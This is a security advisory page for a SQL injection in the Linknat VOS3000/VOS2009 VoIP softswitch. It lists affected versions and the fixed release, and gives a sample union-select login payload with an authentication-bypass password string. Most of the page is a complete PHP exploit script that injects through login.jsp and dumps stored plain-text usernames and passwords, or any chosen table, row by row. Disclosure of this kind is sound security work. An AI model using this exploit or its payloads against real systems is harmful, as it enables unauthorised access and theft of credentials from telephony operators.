Linknat VOS3000/VOS2009 SQL Injection

2016.05.25
Credit: Osama Khalid
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

A SQL injection was found in Linknat VOS3000/VOS2009, a popular VoIP softswitch, that could allow remote attackers to gain access to the credentials stored in plain-text. Application: Linknat VOS3000/VOS2009 Versions Affected: 2.1.1.5, 2.1.1.8, 2.1.2.0 Vendor URL: http://www.linknat.com/ Bug: SQLi (with DBA privileges) Type: Remote Resolution: Fixed, upgrade to 2.1.2.4 Reference: WooYun-2015-145458 - http://www.wooyun.org/bugs/wooyun-2010-0145458 The SQLi reported is time-based blind. Since it is not an in-band SQLi, the results can be gathered from the output of welcome.jsp during the same session. (1st request) POST http://target/eng/login.jsp PARAM loginType=1 name=' union select 1,2,@@version,'hello',5,6# pass=' OR ''=' (2nd request during the same session) GET http://target/eng/welcome.jsp RESULT 0|' union select 1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00| [ EXPLOIT CODE ] <?php # # Linknat VOS2009/VOS3000 SQLi exploit # # DISCLAIMER: The exploit is to be used for educational purposes only # The author would not be responsible for any misuse # # AUTHOR: Osama Khalid # WEBSITE: http://www.codinghazard.com/ # DATE: 19/05/2016 # REF: http://www.wooyun.org/bugs/wooyun-2010-0145458 if ($argc < 2) { banner(); usage(); exit; } $host = $argv[1]; $column_one = isset($argv[2]) ? $argv[2] : "loginname"; $column_two = isset($argv[3]) ? $argv[3] : "password"; $table = isset($argv[4]) ? $argv[4] : "e_user"; $other = isset($argv[5]) ? $argv[5] : ""; function banner() { echo "########################################\n"; echo "# #\n"; echo "# Linknat VOS3000/VOS2009 SQLi exploit #\n"; echo "# #\n"; echo "# Osama Khalid #\n"; echo "########### codinghazard.com ###########\n"; } function usage() { echo "\n"; echo "php vos3000.php [HOST]\n"; echo "php vos3000.php 127.0.0.1\n"; echo "php vos3000.php [HOST] [COL1] [COL2] [TABLE] [OTHER SQL]\n"; echo "php vos3000.php 127.0.0.1 table_schema table_name information_schema.tables \"where table_schema = 'mysql'\" \n"; } function curl($url, $post = array(), $cookies = null, $header = false) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false); curl_setopt($curl, CURLOPT_HEADER, $header); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); if ($cookies != null) curl_setopt($curl, CURLOPT_COOKIE, $cookies); if (count($post) > 0) { foreach ( $post as $key => $value) $post_items[] = $key . '=' . urlencode($value); $post_string = implode('&', $post_items); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string); } $data = curl_exec($curl); curl_close($curl); return $data; } function query($host, $query) { $data = curl("http://$host/eng/login.jsp", array( "loginType" => 1, "name" => "' union " . $query . "#", "pass" => "' OR ''='" ), null, true); preg_match_all('|Set-Cookie: (.*);|U', $data, $matches); $cookies = implode('; ', $matches[1]); $data = curl("http://$host/eng/welcome.jsp", array(), $cookies, false); $parts = explode("|", trim($data)); if (count($parts) < 7) return false; return array($parts[3], $parts[4]); } function ascii_table($data) { $keys = array_keys(end($data)); $wid = array_map('strlen', $keys); foreach($data as $row) { foreach(array_values($row) as $k => $v) $wid[$k] = max($wid[$k], strlen($v)); } foreach($wid as $k => $v) { $fmt[$k] = "%-{$v}s"; $sep[$k] = str_repeat('-', $v); } $fmt = '| ' . implode(' | ', $fmt) . ' |'; $sep = '+-' . implode('-+-', $sep) . '-+'; $buf = array($sep, vsprintf($fmt, $keys), $sep); foreach($data as $row) { $buf[] = vsprintf($fmt, $row); $buf[] = $sep; } return implode("\n", $buf); } banner(); echo "\n"; echo "Target: $host\n"; echo "Column #1: $column_one\n"; echo "Column #2: $column_two\n"; echo "Table: $table\n"; echo "Other: $other\n"; echo "\n"; $results = array(); $count_result = query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table $other"); if ($count_result) { $count = intval($count_result[0]); echo "Found $count rows...\n"; for ($i=0; $i<$count; $i++) { $q = "SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table $other LIMIT " . $i . ",1"; $result = query($host, $q); if ($result) { echo "R" . ($i+1) . "]\t" . $column_one . " = " . hex2bin($result[0]) . ", " . $column_two . " = " . hex2bin($result[1]) . "\n"; } else { echo "Error retrieving row " . ($i+1) . "\n"; } $results[] = array($column_one => hex2bin($result[0]), $column_two => hex2bin($result[1])); } if (count($results) > 0) { echo "\n\n" . ascii_table($results) . "\n"; } } else { echo "Error retrieving row count"; } ?> -- Osama Khalid


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top